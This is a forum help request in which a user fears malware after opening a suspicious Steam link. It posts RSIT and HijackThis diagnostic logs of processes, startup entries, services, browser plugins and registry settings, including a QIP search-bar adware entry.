Malware - please check my log

#1 Post by chvostik »

Hi,
an unknown guy on Steam sent me a link to a suspicious page, which I copied and wanted to google (I basically knew it was malware), but by mistake I entered it into the URL address bar and an error 404 and a Russian message opened. I'm quite worried whether something got downloaded to my computer. I immediately installed ZoneAlarm and Anti-Malware, plus the original NOD was actively running (though without a valid license, so out of date), but I really don't know whether that helped. I don't want to lose my passwords and credit card :-). Thanks in advance for the help, my log is below.


Logfile of random's system information tool 1.10 (written by random/random)
Run by Lobo at 2014-12-09 16:36:55
Microsoft Windows 7 Ultimate
System drive C: has 9 GB (16%) free of 57 GB
Total RAM: 4094 MB (37% free)

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 16:37:03, on 9.12.2014
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16385)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Program Files (x86)\Google\Drive\googledrivesync.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe
C:\Program Files (x86)\Google\Drive\googledrivesync.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
D:\Steam\Steam.exe
D:\Steam\bin\steamwebhelper.exe
D:\Steam\bin\steamwebhelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
C:\Program Files (x86)\Java\jre7\bin\javaw.exe
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe
C:\Program Files\trend micro\Lobo.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://qip.ru
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.qip.ru
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.qip.ru/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.qip.ru
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.zonealarm.com/?src=hp&tbi ... tsId=&ver=&
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.qip.ru/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: QIPBHO Class - {95289393-33EA-4F8D-B952-483415B9C955} - C:\Users\Lobo\AppData\Roaming\Microsoft\Internet Explorer\qipsearchbar.dll
R3 - URLSearchHook: (no name) - - (no file)
F2 - REG:system.ini: UserInit=userinit.exe,
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
O2 - BHO: QIPBHO - {95289393-33EA-4F8D-B952-483415B9C955} - C:\Users\Lobo\AppData\Roaming\Microsoft\Internet Explorer\qipsearchbar.dll
O2 - BHO: (no name) - {95B7759C-8C7F-4BF1-B163-73684A933233} - (no file)
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [ZoneAlarm] "C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [GoogleDriveSync] "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-21-2861910011-920187971-3878467655-1001\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'UpdatusUser')
O4 - HKUS\S-1-5-21-2861910011-920187971-3878467655-1001\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'UpdatusUser')
O4 - Global Startup: vpngui.exe.lnk = ?
O8 - Extra context menu item: Download with GetRight - C:\Program Files (x86)\GetRight\GRdownload.htm
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Office Excel - res://C:\PROGRA~2\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files (x86)\GetRight\GRbrowse.htm
O9 - Extra button: Zdroje informací - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~1\OFFICE11\REFIEBAR.DLL
O23 - Service: ArchestrA Logger (aaLogger) - Invensys Systems, Inc. - C:\Program Files (x86)\Common Files\ArchestrA\aaLogger.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Cisco Systems, Inc. VPN Service (CVPND) - Cisco Systems, Inc. - C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe
O23 - Service: COMODO Dragon Update Service (DragonUpdater) - Comodo Security Solutions, Inc. - C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: ESET Service (ekrn) - ESET - C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe
O23 - Service: ES lite Service for program management. (ES lite Service) - Unknown owner - C:\Program Files (x86)\Gigabyte\EasySaver\ESSVR.EXE
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FS Service Control - Wonderware Corporation - C:\Program Files (x86)\Common Files\ArchestrA\NTServApp.exe
O23 - Service: Služba Google Update (gupdate) (gupdate) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (file missing)
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (file missing)
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: MBAMScheduler - Malwarebytes Corporation - C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NMSAccess - Unknown owner - C:\Program Files (x86)\Blaze Media Pro\NMSAccess32.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: NVIDIA Update Service Daemon (nvUpdatusService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
O23 - Service: PDF Architect Helper Service - pdfforge GmbH - C:\Program Files (x86)\PDF Architect\HelperService.exe
O23 - Service: PDF Architect Service - pdfforge GmbH - C:\Program Files (x86)\PDF Architect\ConversionService.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: Wonderware SuiteLink (slssvc) - Invensys Systems, Inc. - C:\Program Files (x86)\Common Files\ArchestrA\slssvc.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: TeamViewer 9 (TeamViewer9) - TeamViewer GmbH - C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: TrueVector Internet Monitor (vsmon) - Check Point Software Technologies Ltd. - C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
O23 - Service: Wonderware NetDDE Helper (WWNetDDE) - Invensys Systems, Inc. - C:\Program Files (x86)\Common Files\ArchestrA\wwnetdde.exe
O23 - Service: ZoneAlarm Privacy Service (ZAPrivacyService) - Check Point Software Technologies, Ltd. - C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZaPrivacyService.exe

--
End of file - 11454 bytes

======Listing Processes======



\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
winlogon.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
"C:\Windows\system32\nvvsvc.exe"
"C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe"
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
"C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe"
C:\Windows\system32\nvvsvc.exe -session -first
C:\Windows\system32\svchost.exe -k NetworkService
"C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe" -service
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Common Files\ArchestrA\aaLogger.exe"
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
"C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe"
"C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe"
"C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe"
"C:\Program Files (x86)\Gigabyte\EasySaver\ESSVR.EXE"
"C:\Program Files (x86)\Common Files\ArchestrA\NTServApp.exe"
"C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe"
"C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe"
"C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
"C:\Program Files (x86)\Blaze Media Pro\NMSAccess32.exe"
"C:\Program Files (x86)\PDF Architect\HelperService.exe"
"C:\Program Files (x86)\PDF Architect\ConversionService.exe"
"C:\Program Files (x86)\Common Files\ArchestrA\slssvc.exe"
"C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe"
C:\Windows\system32\svchost.exe -k imgsvc
"C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe"
"C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZaPrivacyService.exe"
"taskhost.exe"
"C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe" /starttray
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
"C:\Program Files\ESET\ESET Smart Security\egui.exe" /hide /waitservice
"C:\Program Files\Windows Sidebar\sidebar.exe" /autoRun
"C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart
"C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe"
"C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
"C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe"
"C:/Program Files/NVIDIA Corporation/Display/nvtray.exe" -user_has_logged_in 1
"C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart
C:\Windows\system32\SearchIndexer.exe /Embedding
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
"C:\Program Files (x86)\Mozilla Firefox\firefox.exe"
"C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe"
C:\Windows\system32\sppsvc.exe
"D:\Steam\Steam.exe"
"D:\Steam\bin\steamwebhelper.exe" -cefhost -cachedir "D:\Steam\config\htmlcache" -cookiepath "D:\Steam\config\cookies" -steampid 4776 --blacklist-accelerated-compositing --process-per-tab --disable-accelerated-video-decode --enable-direct-write
"D:\Steam\bin\steamwebhelper.exe" --type=renderer --disable-accelerated-video-decode --disable-delegated-renderer --disable-gpu-compositing --disable-threaded-compositing --enable-pinch --enable-software-compositing --no-sandbox --enable-direct-write --lang=en-US --lang=en-US --product-version="Valve Steam Client" --disable-accelerated-compositing --disable-gpu-compositing --channel="4172.0.1699133600\708524630" /prefetch:673131151
"C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe" -auto -critical
"C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe" -classpath "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar" "-Djava.security.policy=file:C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy" -DtrustProxy=true -Xverify:remote "-Djnlpx.home=C:\\Program Files (x86)\\Java\\jre7\\bin" -Dsun.awt.warmup=true "-Xbootclasspath/a:C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar;C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar;C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar" "-Djnlpx.jvm=C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe" com.sun.javaws.Main -SSVBaselineUpdate -notWebJava

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
"C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe" --channel=5036.159c6fa0.1252309367 "C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll" -greomni "C:\Program Files (x86)\Mozilla Firefox\omni.ja" -appomni "C:\Program Files (x86)\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files (x86)\Mozilla Firefox\browser" E7CF176E110C211B 5036 "\\.\pipe\gecko-crash-server-pipe.5036" plugin
"C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe" --proxy-stub-channel=Flash1100.65F3E980.14185 --host-broker-channel=Flash1100.65F3E980.30457 --host-pid=1100 --host-npapi-version=27 --plugin-path="C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll"
"C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe" --channel=1184.002EF600.273235110 --proxy-stub-channel=Flash1100.65F3E980.14185 --plugin-path="C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll" --host-npapi-version=27 --type=renderer
"D:\Stažené soubory\RSITx64.exe"
C:\Windows\system32\wbem\wmiprvse.exe

======Scheduled tasks folder======

C:\Windows\tasks\Adobe Flash Player Updater.job - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
C:\Windows\tasks\GoogleUpdateTaskMachineCore1cf8c5b584a0b82.job - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
C:\Windows\tasks\GoogleUpdateTaskMachineUA1cf6ab1eb08fd0f.job - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler

=========Mozilla firefox=========

ProfilePath - C:\Users\Lobo\AppData\Roaming\Mozilla\Firefox\Profiles\fa980s6u.default

prefs.js - "browser.startup.homepage" - "seznam.cz"
prefs.js - "keyword.URL" - ""

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 15.0.0.239 Plugin
"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/ShockwavePlayer]
"Description"=Adobe Shockwave Player
"Path"=C:\Windows\SysWOW64\Adobe\Director\np32dsw_1209149.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@java.com/DTPlugin,version=10.45.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=C:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@nvidia.com/3DVision]
"Description"=NVIDIA stereo images plugin for Mozilla browsers
"Path"=C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@nvidia.com/3DVisionStreaming]
"Description"=NVIDIA 3D Vision Streaming plugin for Mozilla browsers
"Path"=C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@pandonetworks.com/PandoWebPlugin]
"Description"=This plugin detects and launches Pando Media Booster
"Path"=C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll


[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 15.0.0.239 Plugin
"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_239.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=C:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll


C:\Users\Lobo\AppData\Roaming\Mozilla\Firefox\Profiles\fa980s6u.default\searchplugins\
qip-search.xml

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-10-08 462760]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95289393-33EA-4F8D-B952-483415B9C955}]
QIPBHO Class - C:\Users\Lobo\AppData\Roaming\Microsoft\Internet Explorer\qipsearchbar.dll [2012-11-26 143472]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2013-10-08 171944]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"=C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2010-04-06 10144288]
"egui"=C:\Program Files\ESET\ESET Smart Security\egui.exe [2013-03-21 6330568]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"=C:\Program Files\Windows Sidebar\sidebar.exe [2009-07-14 1475072]
"DAEMON Tools Lite"=C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [2013-03-14 3672640]
"GoogleDriveSync"=C:\Program Files (x86)\Google\Drive\googledrivesync.exe [2014-08-08 22734160]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"HP Software Update"=C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [2010-06-09 49208]
""= []
"Adobe ARM"=C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-08-21 959176]
"SunJavaUpdateSched"=C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2013-07-02 254336]
"APSDaemon"=C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [2013-04-21 59720]
"ZoneAlarm"=C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe [2014-08-13 137352]

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
vpngui.exe.lnk - C:\Windows\Installer\{5FDC06BF-3D3D-4367-8FFB-4FAFCB61972D}\Icon09DB8A851.exe

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\vsmon]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableLockWorkstation"=0
"DisableChangePassword"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=0
"ConsentPromptBehaviorUser"=3
"EnableLUA"=0
"EnableUIADesktopToggle"=0
"PromptOnSecureDesktop"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoLogoff"=0
"NoClose"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoActiveDesktop"=1
"NoActiveDesktopChanges"=1
"ForceActiveDesktopOn"=0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvyu"=msyuv.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"vidc.yvu9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"wave5"=wdmaud.drv
"midi5"=wdmaud.drv
"mixer5"=wdmaud.drv
"aux1"=wdmaud.drv
"wave6"=wdmaud.drv
"midi6"=wdmaud.drv
"mixer6"=wdmaud.drv
"aux2"=wdmaud.drv
"wave7"=wdmaud.drv
"midi7"=wdmaud.drv
"mixer7"=wdmaud.drv
"aux3"=wdmaud.drv
"wave8"=wdmaud.drv
"midi8"=wdmaud.drv
"mixer8"=wdmaud.drv
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"wave2"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer2"=wdmaud.drv
"wave3"=wdmaud.drv
"midi3"=wdmaud.drv
"mixer3"=wdmaud.drv
"VIDC.FPS1"=frapsv64.dll

======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1
